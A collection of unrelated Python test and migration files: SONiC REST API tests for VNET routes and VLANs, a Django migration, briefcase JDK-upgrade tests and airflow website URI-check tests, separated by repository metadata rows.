{"cmd": "add", "ip_prefix": "101.0.20.5/32", "nexthop": "100.3.152.52", "vnid": 7036002, "mac_address": "1c:34:da:72:b0:8a"}, \
{"cmd": "add", "ip_prefix": "192.168.20.4/32", "nexthop": "100.3.152.52", "vnid": 7036002, "mac_address": null}, \
{"cmd": "add", "ip_prefix": "100.0.30.0/24", "nexthop": "100.3.152.52", "vnid": 7036002, "mac_address": null}]'
logger.info("Adding routes with vnid: 7036002 to VNET vnet-guid-3")
r = restapi.patch_config_vrouter_vrf_id_routes(construct_url, 'vnet-guid-3', params)
pytest_assert(r.status_code == 204)
# Verify routes
params = '{}'
r = restapi.get_config_vrouter_vrf_id_routes(construct_url, 'vnet-guid-3', params)
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = [{"nexthop": "100.3.152.52", "ip_prefix": "192.168.20.4/32", "vnid": 7036002},
{"nexthop": "100.3.152.52", "ip_prefix": "101.0.20.5/32", "mac_address": "1c:34:da:72:b0:8a", "vnid": 7036002},
{"nexthop": "100.3.152.52", "ip_prefix": "100.0.20.4/32", "vnid": 7036002},
{"nexthop": "100.3.152.52", "ip_prefix": "100.0.30.0/24", "vnid": 7036002}]
for route in expected:
pytest_assert(route in r.json())
logger.info("Routes with vnid: 3000 to VNET vnet-guid-3 have been added successfully")
# Add routes
params = '[{"cmd": "add", "ip_prefix": "100.0.50.4/24", "nexthop": "100.3.152.52", "vnid": 7036002, "mac_address": null}, \
{"cmd": "add", "ip_prefix": "100.0.70.0/16", "nexthop": "100.3.152.52", "vnid": 7036002, "mac_address": null}]'
logger.info("Adding routes with incorrect CIDR addresses with vnid: 7036002 to VNET vnet-guid-3")
r = restapi.patch_config_vrouter_vrf_id_routes(construct_url, 'vnet-guid-3', params)
pytest_assert(r.status_code == 207)
# Verify routes have not been added
# Add some delay before query
time.sleep(5)
params = '{}'
r = restapi.get_config_vrouter_vrf_id_routes(construct_url, 'vnet-guid-3', params)
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = [{"nexthop": "100.3.152.52", "ip_prefix": "100.0.50.4/24", "vnid": 7036002},
{"nexthop": "100.3.152.52", "ip_prefix": "100.0.70.0/16", "vnid": 7036002}]
for route in expected:
pytest_assert(route not in r.json())
logger.info("Routes with incorrect CIDR addresses with vnid: 7036002 to VNET vnet-guid-3 have not been added successfully")
'''
This test creates a VNET. It adds routes to the VNET and deletes them
'''
def test_create_vrf(construct_url):
# Create VNET
params = '{"vnid": 7039114}'
logger.info("Creating VNET vnet-guid-10 with vnid: 7039114")
r = restapi.post_config_vrouter_vrf_id(construct_url, 'vnet-guid-10', params)
pytest_assert(r.status_code == 204)
# Verify VNET has been created
r = restapi.get_config_vrouter_vrf_id(construct_url, 'vnet-guid-10')
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = '{"attr": {"vnid": 7039114}, "vnet_id": "vnet-guid-10"}'
pytest_assert(r.json() == json.loads(expected))
logger.info("VNET with vnet_id: vnet-guid-10 has been successfully created with vnid: 7039114")
# Add routes
params = '[{"cmd": "add", "ip_prefix": "10.1.0.1/32", "nexthop": "100.78.60.37", "vnid": 7039114, "mac_address": "00:0d:3a:f9:1a:20"}, \
{"cmd": "add", "ip_prefix": "10.1.0.2/32", "nexthop": "100.78.60.37", "vnid": 7039114, "mac_address": "00:0d:3a:f9:1a:20"}, \
{"cmd": "add", "ip_prefix": "10.1.0.3/32", "nexthop": "100.78.60.37", "vnid": 7039114, "mac_address": "00:0d:3a:f9:1a:20"}, \
{"cmd": "add", "ip_prefix": "10.1.0.4/32", "nexthop": "100.78.60.37", "vnid": 7039114, "mac_address": "00:0d:3a:f9:1a:20"}, \
{"cmd": "add", "ip_prefix": "10.1.0.5/32", "nexthop": "100.78.60.37", "vnid": 7039114, "mac_address": "00:0d:3a:f9:1a:20"}]'
logger.info("Adding routes with vnid: 7039114 to VNET vnet-guid-10")
r = restapi.patch_config_vrouter_vrf_id_routes(construct_url, 'vnet-guid-10', params)
pytest_assert(r.status_code == 204)
# Verify routes
params = '{}'
r = restapi.get_config_vrouter_vrf_id_routes(construct_url, 'vnet-guid-10', params)
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = [{"nexthop": "100.78.60.37", "ip_prefix": "10.1.0.1/32", "vnid": 7039114, "mac_address": "00:0d:3a:f9:1a:20"},
{"nexthop": "100.78.60.37", "ip_prefix": "10.1.0.2/32", "vnid": 7039114, "mac_address": "00:0d:3a:f9:1a:20"},
{"nexthop": "100.78.60.37", "ip_prefix": "10.1.0.3/32", "vnid": 7039114, "mac_address": "00:0d:3a:f9:1a:20"},
{"nexthop": "100.78.60.37", "ip_prefix": "10.1.0.4/32", "vnid": 7039114, "mac_address": "00:0d:3a:f9:1a:20"},
{"nexthop": "100.78.60.37", "ip_prefix": "10.1.0.5/32", "vnid": 7039114, "mac_address": "00:0d:3a:f9:1a:20"}]
for route in expected:
pytest_assert(route in r.json())
logger.info("Routes with vnid: 7039114 to VNET vnet-guid-10 have been added successfully")
# Delete routes
params = '[{"cmd": "delete", "ip_prefix": "10.1.0.1/32", "nexthop": "100.78.60.37", "vnid": 7039114, "mac_address": "00:0d:3a:f9:1a:20"}, \
{"cmd": "delete", "ip_prefix": "10.1.0.2/32", "nexthop": "100.78.60.37", "vnid": 7039114, "mac_address": "00:0d:3a:f9:1a:20"}, \
{"cmd": "delete", "ip_prefix": "10.1.0.3/32", "nexthop": "100.78.60.37", "vnid": 7039114, "mac_address": "00:0d:3a:f9:1a:20"}, \
{"cmd": "delete", "ip_prefix": "10.1.0.4/32", "nexthop": "100.78.60.37", "vnid": 7039114, "mac_address": "00:0d:3a:f9:1a:20"}, \
{"cmd": "delete", "ip_prefix": "10.1.0.5/32", "nexthop": "100.78.60.37", "vnid": 7039114, "mac_address": "00:0d:3a:f9:1a:20"}]'
logger.info("Deleting routes with vnid: 7039114 from VNET vnet-guid-10")
r = restapi.patch_config_vrouter_vrf_id_routes(construct_url, 'vnet-guid-10', params)
pytest_assert(r.status_code == 204)
# Verify routes
params = '{}'
r = restapi.get_config_vrouter_vrf_id_routes(construct_url, 'vnet-guid-10', params)
pytest_assert(r.status_code == 200)
logger.info(r.json())
pytest_assert(len(r.json()) == 0)
logger.info("Routes with vnid: 7039114 from VNET vnet-guid-10 have been deleted successfully")
'''
This test creates a default VxLAN Tunnel and two VNETs. It adds VLAN, VLAN member, VLAN neighbor and routes to each VNET
'''
def test_create_interface(construct_url, vlan_members):
# Create VNET
params = '{"vnid": 7039115}'
logger.info("Creating VNET vnet-guid-3 with vnid: 7039115")
r = restapi.post_config_vrouter_vrf_id(construct_url, 'vnet-guid-4', params)
pytest_assert(r.status_code == 204)
# Verify VNET has been created
r = restapi.get_config_vrouter_vrf_id(construct_url, 'vnet-guid-4')
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = '{"attr": {"vnid": 7039115}, "vnet_id": "vnet-guid-4"}'
pytest_assert(r.json() == json.loads(expected))
logger.info("VNET with vnet_id: vnet-guid-4 has been successfully created with vnid: 7039115")
# Create VLAN
params = '{"vnet_id": "vnet-guid-4", "ip_prefix": "40.0.0.1/24"}'
logger.info("Creating VLAN 4000 with ip_prefix: 40.0.0.1/24 under vnet_id: vnet-guid-4")
r = restapi.post_config_vlan(construct_url, '4000', params)
pytest_assert(r.status_code == 204)
# Verify VLAN has been created
r = restapi.get_config_vlan(construct_url, '4000')
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = '{"attr": {"ip_prefix": "40.0.0.1/24", "vnet_id": "vnet-guid-4"}, "vlan_id": 4000}'
pytest_assert(r.json() == json.loads(expected))
logger.info("VLAN 4000 with ip_prefix: 40.0.0.1/24 under vnet_id: vnet-guid-4 has been successfully created")
vlan_intf = vlan_members[0]
logger.info("VLAN Interface: "+vlan_intf)
# Add and configure VLAN member
params = '{"tagging_mode": "tagged"}'
logger.info("Adding "+vlan_intf+" with tagging_mode: tagged to VLAN 4000")
r = restapi.post_config_vlan_member(construct_url, '4000', vlan_intf, params)
pytest_assert(r.status_code == 204)
# Verify VLAN member has been added
r = restapi.get_config_vlan_member(construct_url, '4000', vlan_intf)
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = '{"if_name": "'+vlan_intf+'", "vlan_id": 4000, "attr": {"tagging_mode": "tagged"}}'
pytest_assert(r.json() == json.loads(expected))
logger.info(vlan_intf+" with tagging_mode: tagged has been successfully added to VLAN 4000")
# Add neighbor
params = '{}'
logger.info("Adding neighbor 40.0.0.4 to VLAN 4000")
r = restapi.post_config_vlan_neighbor(construct_url, '4000', '40.0.0.4', params)
pytest_assert(r.status_code == 204)
# Verify neighbor has been added
r = restapi.get_config_vlan_neighbor(construct_url, '4000', '40.0.0.4')
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = '{"ip_addr": "40.0.0.4", "vlan_id": 4000}'
pytest_assert(r.json() == json.loads(expected))
logger.info("Neighbor 40.0.0.4 has been successfully added to VLAN 4000")
# Delete Neighbor
params = '{}'
logger.info("Deleting neighbor 40.0.0.4 from VLAN 4000")
r = restapi.delete_config_vlan_neighbor(construct_url, '4000', '40.0.0.4', params)
pytest_assert(r.status_code == 204)
# Verify neighbor has been deleted
r = restapi.get_config_vlan_neighbor(construct_url, '4000', '40.0.0.4')
pytest_assert(r.status_code == 404)
logger.info(r.json())
logger.info("Neighbor 40.0.0.4 has been successfully deleted to VLAN 4000")
# Delete VLAN member
params = '{}'
logger.info("Deleting "+vlan_intf+" with tagging_mode: tagged to VLAN 4000")
r = restapi.delete_config_vlan_member(construct_url, '4000', vlan_intf, params)
pytest_assert(r.status_code == 204)
# Verify VLAN member has been deleted
r = restapi.get_config_vlan_member(construct_url, '4000', vlan_intf)
pytest_assert(r.status_code == 404)
logger.info(r.json())
logger.info(vlan_intf+" with tagging_mode: tagged has been successfully deleted to VLAN 4000")
# Delete VLAN
params = '{}'
logger.info("Deleting VLAN 4000")
r = restapi.delete_config_vlan(construct_url, '4000', params)
pytest_assert(r.status_code == 204)
# Verify VLAN has been deleted
r = restapi.get_config_vlan(construct_url, '4000')
pytest_assert(r.status_code == 404)
logger.info(r.json())
logger.info("VLAN 4000 has been successfully deleted")
# Delete VNET
params = '{}'
logger.info("Deleting VNET vnet-guid-3")
r = restapi.delete_config_vrouter_vrf_id(construct_url, 'vnet-guid-4', params)
pytest_assert(r.status_code == 204)
# Verify VNET has been deleted
r = restapi.get_config_vrouter_vrf_id(construct_url, 'vnet-guid-4')
pytest_assert(r.status_code == 404)
logger.info(r.json())
logger.info("VNET with vnet_id: vnet-guid-4 has been successfully deleted")
| 49.330166 | 144 | 0.656202 | 3,175 | 20,768 | 4.131024 | 0.053858 | 0.05642 | 0.059469 | 0.068085 | 0.920936 | 0.900046 | 0.878469 | 0.834858 | 0.815493 | 0.785529 | 0 | 0.116051 | 0.17474 | 20,768 | 420 | 145 | 49.447619 | 0.649221 | 0.061874 | 0 | 0.467577 | 0 | 0.122867 | 0.375707 | 0 | 0 | 0 | 0 | 0 | 0.228669 | 1 | 0.010239 | false | 0 | 0.023891 | 0 | 0.03413 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fe01e92159651c17418a2aa99ab1f27fc4952fa7 | 1,241 | py | Python | protein/migrations/0008_auto_20200422_1636.py | pszgaspar/protwis | 4989a67175ef3c95047d795c843cf6b9cf4141fa | [
"Apache-2.0"
] | 21 | 2016-01-20T09:33:14.000Z | 2021-12-20T19:19:45.000Z | protein/migrations/0008_auto_20200422_1636.py | pszgaspar/protwis | 4989a67175ef3c95047d795c843cf6b9cf4141fa | [
"Apache-2.0"
] | 75 | 2016-02-26T16:29:58.000Z | 2022-03-21T12:35:13.000Z | protein/migrations/0008_auto_20200422_1636.py | AlibekMamyrbekov/protwis | b3d477b1982623618d995ab5c7f47c918a70238b | [
"Apache-2.0"
] | 77 | 2016-01-22T08:44:26.000Z | 2022-02-01T15:54:56.000Z | # Generated by Django 3.0.4 on 2020-04-22 14:36
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('protein', '0007_proteingproteinpair_references'),
]
operations = [
migrations.AddField(
model_name='proteingproteinpair',
name='emax_dnorm',
field=models.FloatField(null=True),
),
migrations.AddField(
model_name='proteingproteinpair',
name='emax_mean',
field=models.FloatField(null=True),
),
migrations.AddField(
model_name='proteingproteinpair',
name='emax_sem',
field=models.FloatField(null=True),
),
migrations.AddField(
model_name='proteingproteinpair',
name='log_ec50_dnorm',
field=models.FloatField(null=True),
),
migrations.AddField(
model_name='proteingproteinpair',
name='log_ec50_mean',
field=models.FloatField(null=True),
),
migrations.AddField(
model_name='proteingproteinpair',
name='log_ec50_sem',
field=models.FloatField(null=True),
),
]
| 28.204545 | 59 | 0.572925 | 109 | 1,241 | 6.366972 | 0.348624 | 0.15562 | 0.198847 | 0.233429 | 0.76513 | 0.76513 | 0.714697 | 0.636888 | 0.636888 | 0.636888 | 0 | 0.029586 | 0.319098 | 1,241 | 43 | 60 | 28.860465 | 0.791716 | 0.036261 | 0 | 0.648649 | 1 | 0 | 0.18593 | 0.029313 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.027027 | 0 | 0.108108 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fe09b2ced11f57d37b945455ce0cb7da292bace6 | 157 | py | Python | db/tests/fixtures/user_request.py | matchd-ch/matchd-backend | 84be4aab1b4708cae50a8988301b15df877c8db0 | [
"Apache-2.0"
] | 1 | 2022-03-03T09:55:57.000Z | 2022-03-03T09:55:57.000Z | db/tests/fixtures/user_request.py | matchd-ch/matchd-backend | 84be4aab1b4708cae50a8988301b15df877c8db0 | [
"Apache-2.0"
] | 7 | 2022-02-09T10:44:53.000Z | 2022-03-28T03:29:43.000Z | db/tests/fixtures/user_request.py | matchd-ch/matchd-backend | 84be4aab1b4708cae50a8988301b15df877c8db0 | [
"Apache-2.0"
] | null | null | null | import pytest
@pytest.fixture
def user_request_valid_args():
return {'name': 'Send Money', 'email': 'princeofworld@email.com', 'message': 'sendmoney'}
| 22.428571 | 93 | 0.713376 | 19 | 157 | 5.736842 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121019 | 157 | 6 | 94 | 26.166667 | 0.789855 | 0 | 0 | 0 | 0 | 0 | 0.369427 | 0.146497 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.25 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
fe0c3ca1f7f701af714988922f506e4a6011042f | 8,472 | py | Python | tests/integrations/java/test_JDK_upgrade.py | junefish/python-briefcase | 93f5c22304b3914b3c20b82e01d0a5914119faef | [
"BSD-3-Clause"
] | 917 | 2019-03-30T15:45:39.000Z | 2022-03-31T05:32:02.000Z | tests/integrations/java/test_JDK_upgrade.py | junefish/python-briefcase | 93f5c22304b3914b3c20b82e01d0a5914119faef | [
"BSD-3-Clause"
] | 429 | 2019-04-07T19:03:20.000Z | 2022-03-31T23:47:42.000Z | tests/integrations/java/test_JDK_upgrade.py | junefish/python-briefcase | 93f5c22304b3914b3c20b82e01d0a5914119faef | [
"BSD-3-Clause"
] | 166 | 2019-04-02T01:56:55.000Z | 2022-03-28T19:10:02.000Z | import os
import shutil
import sys
from unittest.mock import MagicMock
import pytest
from requests import exceptions as requests_exceptions
from briefcase.exceptions import (
BriefcaseCommandError,
MissingToolError,
NetworkFailure,
NonManagedToolError
)
from briefcase.integrations.java import JDK
from tests.utils import FsPathMock
@pytest.fixture
def test_command(tmp_path):
command = MagicMock()
command.host_os = 'Linux'
command.tools_path = tmp_path / 'tools'
return command
def test_non_managed_install(test_command, tmp_path, capsys):
"If the Java install points to a non-managed install, no upgrade is attempted"
# Make the installation point to somewhere else.
jdk = JDK(test_command, java_home=tmp_path / 'other-jdk')
# Attempt an upgrade. This will fail because the install is non-managed
with pytest.raises(NonManagedToolError):
jdk.upgrade()
# No download was attempted
assert test_command.download_url.call_count == 0
def test_non_existing_install(test_command, tmp_path):
"If there's no existing managed JDK install, upgrading is an error"
# Create an SDK wrapper around a non-existing managed install
jdk = JDK(test_command, java_home=tmp_path / 'tools' / 'java')
with pytest.raises(MissingToolError):
jdk.upgrade()
# No download was attempted
assert test_command.download_url.call_count == 0
def test_existing_install(test_command, tmp_path):
"If there's an existing managed JDK install, it is deleted and redownloaded"
# Create a mock of a previously installed Java version.
java_home = tmp_path / 'tools' / 'java'
(java_home / 'bin').mkdir(parents=True)
# We actually need to delete the original java install
def rmtree(path):
shutil.rmtree(path)
test_command.shutil.rmtree.side_effect = rmtree
# Mock the cached download path.
# Consider to remove if block when we drop py3.7 support, only keep statements from else.
# MagicMock below py3.8 doesn't has __fspath__ attribute.
if sys.version_info < (3, 8):
archive = FsPathMock("/path/to/download.zip")
else:
archive = MagicMock()
archive.__fspath__.return_value = "/path/to/download.zip"
test_command.download_url.return_value = archive
# Create a directory to make it look like Java was downloaded and unpacked.
(tmp_path / 'tools' / 'jdk8u242-b08').mkdir(parents=True)
# Create an SDK wrapper
jdk = JDK(test_command, java_home=java_home)
# Attempt an upgrade.
jdk.upgrade()
# The old version has been deleted
test_command.shutil.rmtree.assert_called_with(java_home)
# A download was initiated
test_command.download_url.assert_called_with(
url="https://github.com/AdoptOpenJDK/openjdk8-binaries/releases/download/"
"jdk8u242-b08/OpenJDK8U-jdk_x64_linux_hotspot_8u242b08.tar.gz",
download_path=tmp_path / 'tools',
)
# The archive was unpacked.
# TODO: Py3.6 compatibility; os.fsdecode not required in Py3.7
test_command.shutil.unpack_archive.assert_called_with(
"/path/to/download.zip",
extract_dir=os.fsdecode(tmp_path / "tools")
)
# The original archive was deleted
archive.unlink.assert_called_once_with()
def test_macOS_existing_install(test_command, tmp_path):
"If there's an existing managed macOS JDK install, it is deleted and redownloaded"
# Force mocking on macOS
test_command.host_os = 'Darwin'
# Create a mock of a previously installed Java version.
java_home = tmp_path / 'tools' / 'java' / 'Contents' / 'Home'
(java_home / 'bin').mkdir(parents=True)
# We actually need to delete the original java install
def rmtree(path):
shutil.rmtree(path)
test_command.shutil.rmtree.side_effect = rmtree
# Mock the cached download path.
# Consider to remove if block when we drop py3.7 support, only keep statements from else.
# MagicMock below py3.8 doesn't has __fspath__ attribute.
if sys.version_info < (3, 8):
archive = FsPathMock("/path/to/download.zip")
else:
archive = MagicMock()
archive.__fspath__.return_value = "/path/to/download.zip"
test_command.download_url.return_value = archive
# Create a directory to make it look like Java was downloaded and unpacked.
(tmp_path / 'tools' / 'jdk8u242-b08').mkdir(parents=True)
# Create an SDK wrapper
jdk = JDK(test_command, java_home=java_home)
# Attempt an upgrade.
jdk.upgrade()
# The old version has been deleted
test_command.shutil.rmtree.assert_called_with(tmp_path / 'tools' / 'java')
# A download was initiated
test_command.download_url.assert_called_with(
url="https://github.com/AdoptOpenJDK/openjdk8-binaries/releases/download/"
"jdk8u242-b08/OpenJDK8U-jdk_x64_mac_hotspot_8u242b08.tar.gz",
download_path=tmp_path / 'tools',
)
# The archive was unpacked.
# TODO: Py3.6 compatibility; os.fsdecode not required in Py3.7
test_command.shutil.unpack_archive.assert_called_with(
"/path/to/download.zip",
extract_dir=os.fsdecode(tmp_path / "tools")
)
# The original archive was deleted
archive.unlink.assert_called_once_with()
def test_download_fail(test_command, tmp_path):
"If there's an existing managed JDK install, it is deleted and redownloaded"
# Create a mock of a previously installed Java version.
java_home = tmp_path / 'tools' / 'java'
(java_home / 'bin').mkdir(parents=True)
# We actually need to delete the original java install
def rmtree(path):
shutil.rmtree(path)
test_command.shutil.rmtree.side_effect = rmtree
# Mock a failure on download
test_command.download_url.side_effect = requests_exceptions.ConnectionError
# Create an SDK wrapper
jdk = JDK(test_command, java_home=java_home)
# Attempt an upgrade. This will fail along with the download
with pytest.raises(NetworkFailure):
jdk.upgrade()
# The old version has been deleted
test_command.shutil.rmtree.assert_called_with(java_home)
# A download was initiated
test_command.download_url.assert_called_with(
url="https://github.com/AdoptOpenJDK/openjdk8-binaries/releases/download/"
"jdk8u242-b08/OpenJDK8U-jdk_x64_linux_hotspot_8u242b08.tar.gz",
download_path=tmp_path / 'tools',
)
# No attempt was made to unpack the archive
assert test_command.shutil.unpack_archive.call_count == 0
def test_unpack_fail(test_command, tmp_path):
"If there's an existing managed JDK install, it is deleted and redownloaded"
# Create a mock of a previously installed Java version.
java_home = tmp_path / 'tools' / 'java'
(java_home / 'bin').mkdir(parents=True)
# We actually need to delete the original java install
def rmtree(path):
shutil.rmtree(path)
test_command.shutil.rmtree.side_effect = rmtree
# Mock the cached download path
# Consider to remove if block when we drop py3.7 support, only keep statements from else.
# MagicMock below py3.8 doesn't has __fspath__ attribute.
if sys.version_info < (3, 8):
archive = FsPathMock("/path/to/download.zip")
else:
archive = MagicMock()
archive.__fspath__.return_value = "/path/to/download.zip"
test_command.download_url.return_value = archive
# Mock an unpack failure due to an invalid archive
test_command.shutil.unpack_archive.side_effect = shutil.ReadError
# Create an SDK wrapper
jdk = JDK(test_command, java_home=java_home)
# Attempt an upgrade. This will fail.
with pytest.raises(BriefcaseCommandError):
jdk.upgrade()
# The old version has been deleted
test_command.shutil.rmtree.assert_called_with(java_home)
# A download was initiated
test_command.download_url.assert_called_with(
url="https://github.com/AdoptOpenJDK/openjdk8-binaries/releases/download/"
"jdk8u242-b08/OpenJDK8U-jdk_x64_linux_hotspot_8u242b08.tar.gz",
download_path=tmp_path / 'tools',
)
# The archive was unpacked.
# TODO: Py3.6 compatibility; os.fsdecode not required in Py3.7
test_command.shutil.unpack_archive.assert_called_with(
"/path/to/download.zip",
extract_dir=os.fsdecode(tmp_path / "tools")
)
# The original archive was not deleted
assert archive.unlink.call_count == 0
| 35.008264 | 93 | 0.712937 | 1,154 | 8,472 | 5.051127 | 0.14818 | 0.069823 | 0.032939 | 0.037742 | 0.805627 | 0.788128 | 0.781781 | 0.775605 | 0.764625 | 0.757591 | 0 | 0.016258 | 0.201369 | 8,472 | 241 | 94 | 35.153527 | 0.845256 | 0.323182 | 0 | 0.62406 | 0 | 0 | 0.214356 | 0.069657 | 0 | 0 | 0 | 0.004149 | 0.12782 | 1 | 0.082707 | false | 0 | 0.067669 | 0 | 0.157895 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a3c40eb7a39ecb3f63e62b546016b5e02696384a | 8,765 | py | Python | airflow/tests/test_check_website_operations.py | rafaelpezzuto/opac-airflow | 7e73eaacdace5ca9d3dbcf2c5f84019568282485 | [
"BSD-2-Clause"
] | null | null | null | airflow/tests/test_check_website_operations.py | rafaelpezzuto/opac-airflow | 7e73eaacdace5ca9d3dbcf2c5f84019568282485 | [
"BSD-2-Clause"
] | null | null | null | airflow/tests/test_check_website_operations.py | rafaelpezzuto/opac-airflow | 7e73eaacdace5ca9d3dbcf2c5f84019568282485 | [
"BSD-2-Clause"
] | null | null | null | from unittest import TestCase
from unittest.mock import patch, call
from airflow import DAG
from operations.check_website_operations import (
concat_website_url_and_uri_list_items,
check_uri_list,
check_website_uri_list,
)
class TestConcatWebsiteUrlAndUriListItems(TestCase):
def test_concat_website_url_and_uri_list_items_for_none_website_url_and_none_uri_list_returns_empty_list(self):
items = concat_website_url_and_uri_list_items(None, None)
self.assertEqual([], items)
def test_concat_website_url_and_uri_list_items_for_none_website_url_returns_empty_list(self):
items = concat_website_url_and_uri_list_items(None, ['uri'])
self.assertEqual([], items)
def test_concat_website_url_and_uri_list_items_for_none_uri_list_returns_empty_list(self):
items = concat_website_url_and_uri_list_items(['website'], None)
self.assertEqual([], items)
def test_concat_website_url_and_uri_list_items_returns_list(self):
items = concat_website_url_and_uri_list_items(
['website1', 'website2'],
['/uri1', '/uri2'])
self.assertEqual(
['website1/uri1',
'website1/uri2',
'website2/uri1',
'website2/uri2', ],
items)
class MockResponse:
def __init__(self, code):
self.status_code = code
class MockLogger:
def __init__(self):
self._info = []
self._debug = []
def info(self, msg):
self._info.append(msg)
def debug(self, msg):
self._debug.append(msg)
class TestCheckUriList(TestCase):
@patch('operations.check_website_operations.requests.head')
def test_check_uri_list_for_status_code_200_returns_empty_list(self, mock_req_head):
mock_req_head.side_effect = [MockResponse(200), MockResponse(200), ]
uri_list = ["goodURI1", "goodURI2", ]
result = check_uri_list(uri_list)
self.assertEqual([], result)
@patch('operations.check_website_operations.requests.head')
def test_check_uri_list_for_status_code_301_returns_empty_list(self, mock_req_head):
mock_req_head.side_effect = [MockResponse(301)]
uri_list = ["URI"]
result = check_uri_list(uri_list)
self.assertEqual([], result)
@patch('operations.check_website_operations.requests.head')
def test_check_uri_list_for_status_code_302_returns_empty_list(self, mock_req_head):
mock_req_head.side_effect = [MockResponse(302)]
uri_list = ["URI"]
result = check_uri_list(uri_list)
self.assertEqual([], result)
@patch('operations.check_website_operations.requests.head')
def test_check_uri_list_for_status_code_404_returns_failure_list(self, mock_req_head):
mock_req_head.side_effect = [MockResponse(404)]
uri_list = ["BAD_URI"]
result = check_uri_list(uri_list)
self.assertEqual(
uri_list,
result)
@patch('operations.check_website_operations.requests.head')
def test_check_uri_list_for_status_code_429_returns_failure_list(self, mock_req_head):
mock_req_head.side_effect = [MockResponse(429), MockResponse(404)]
uri_list = ["BAD_URI"]
result = check_uri_list(uri_list)
self.assertEqual(
uri_list,
result)
@patch('operations.check_website_operations.retry_after')
@patch('operations.check_website_operations.requests.head')
def test_check_uri_list_for_status_code_200_after_retries_returns_failure_list(self, mock_req_head, mock_retry_after):
mock_retry_after.return_value = [
0.1, 0.2, 0.4, 0.8, 1,
]
mock_req_head.side_effect = [
MockResponse(429),
MockResponse(502),
MockResponse(503),
MockResponse(504),
MockResponse(500),
MockResponse(200),
]
uri_list = ["GOOD_URI"]
result = check_uri_list(uri_list)
self.assertEqual([], result)
@patch('operations.check_website_operations.retry_after')
@patch('operations.check_website_operations.requests.head')
def test_check_uri_list_for_status_code_404_after_retries_returns_failure_list(self, mock_req_head, mock_retry_after):
mock_retry_after.return_value = [
0.1, 0.2, 0.4, 0.8, 1,
]
mock_req_head.side_effect = [
MockResponse(429),
MockResponse(502),
MockResponse(404),
]
uri_list = ["BAD_URI"]
result = check_uri_list(uri_list)
self.assertEqual(["BAD_URI"], result)
class TestCheckWebsiteUriList(TestCase):
def test_check_website_uri_list_raises_value_error_because_website_urls_are_missing(self):
with self.assertRaises(ValueError):
check_website_uri_list('/path/uri_list_file_path.lst', [])
@patch("operations.check_website_operations.Logger.info")
@patch("operations.check_website_operations.read_file")
def test_check_website_uri_list_informs_zero_uri(self, mock_read_file, mock_info):
mock_read_file.return_value = []
uri_list_file_path = "/tmp/uri_list_2010-10-09.lst"
website_url_list = ["http://www.scielo.br", "https://newscielo.br"]
check_website_uri_list(uri_list_file_path, website_url_list)
self.assertEqual(
mock_info.call_args_list,
[
call('Quantidade de URI: %i', 0),
call("Encontrados: %i/%i", 0, 0),
]
)
@patch("operations.check_website_operations.Logger.info")
@patch("operations.check_website_operations.requests.head")
@patch("operations.check_website_operations.read_file")
def test_check_website_uri_list_informs_that_all_were_found(self, mock_read_file, mock_head, mock_info):
mock_read_file.return_value = (
"/scielo.php?script=sci_serial&pid=0001-3765\n"
"/scielo.php?script=sci_issues&pid=0001-3765\n"
"/scielo.php?script=sci_issuetoc&pid=0001-376520200005\n"
"/scielo.php?script=sci_arttext&pid=S0001-37652020000501101\n"
).split()
mock_head.side_effect = [
MockResponse(200),
MockResponse(200),
MockResponse(200),
MockResponse(200),
MockResponse(200),
MockResponse(200),
MockResponse(200),
MockResponse(200),
MockResponse(200),
]
uri_list_file_path = "/tmp/uri_list_2010-10-09.lst"
website_url_list = ["http://www.scielo.br", "https://newscielo.br"]
check_website_uri_list(uri_list_file_path, website_url_list)
self.assertEqual(
mock_info.call_args_list,
[
call('Quantidade de URI: %i', 8),
call("Encontrados: %i/%i", 8, 8),
]
)
@patch("operations.check_website_operations.Logger.info")
@patch("operations.check_website_operations.requests.head")
@patch("operations.check_website_operations.read_file")
def test_check_website_uri_list_informs_that_some_of_uri_items_were_not_found(self, mock_read_file, mock_head, mock_info):
mock_read_file.return_value = (
"/scielo.php?script=sci_serial&pid=0001-3765\n"
"/scielo.php?script=sci_issues&pid=0001-3765\n"
"/scielo.php?script=sci_issuetoc&pid=0001-376520200005\n"
"/scielo.php?script=sci_arttext&pid=S0001-37652020000501101\n"
).split()
mock_head.side_effect = [
MockResponse(200),
MockResponse(404),
MockResponse(200),
MockResponse(200),
MockResponse(500),
MockResponse(404),
MockResponse(200),
MockResponse(200),
MockResponse(200),
MockResponse(200),
]
uri_list_file_path = "/tmp/uri_list_2010-10-09.lst"
